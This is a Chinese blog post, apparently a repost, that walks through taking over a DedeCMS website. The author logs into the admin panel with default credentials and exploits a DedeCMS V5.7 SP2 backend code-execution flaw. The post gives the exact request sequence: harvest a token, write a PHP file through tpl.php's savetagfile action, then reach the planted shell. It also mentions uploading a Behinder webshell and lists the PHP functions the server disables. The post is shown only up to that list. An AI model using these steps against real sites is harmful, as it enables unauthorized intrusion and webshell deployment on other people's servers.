admin管理员组文章数量:1558102
前言:最近拿到一个shell,被禁用了 php中能直接执行系统程序的函数,虽然最后没有绕过成功。但是也有不小的收获。
首先说下shell怎么来的
一个织梦的站,找到后台登录路径。随手输入默认账户密码:admin/admin,顺利进入后台
利用DedeCMS V5.7 SP2后台存在代码执行漏洞
拿到shell
1.首先获取token。访问域名 + /dede/tpl.php?action=upload
http://127.0.0.1/uploads/dede/tpl.php?action=upload
通过查看页面源码即可获得 token
2.然后访问
http://127.0.0.1/dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=你的token值
3.shell 地址
http://127.0.0.1/include/taglib/secnote.lib.php
无法执行任何命令,但是可以进行文件上传。起初以为是我的一句话木马有问题。上传个冰蝎马儿
看到这个提示大概猜到函数被禁用,查看phpinfo的确认
禁用了下列函数
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcnt
本文标签: 函数姿势常用PHPdisablefunctions
版权声明:本文标题:突破PHP disable_functions禁用函数常用绕过姿势 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/xitong/1727341314a1109444.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论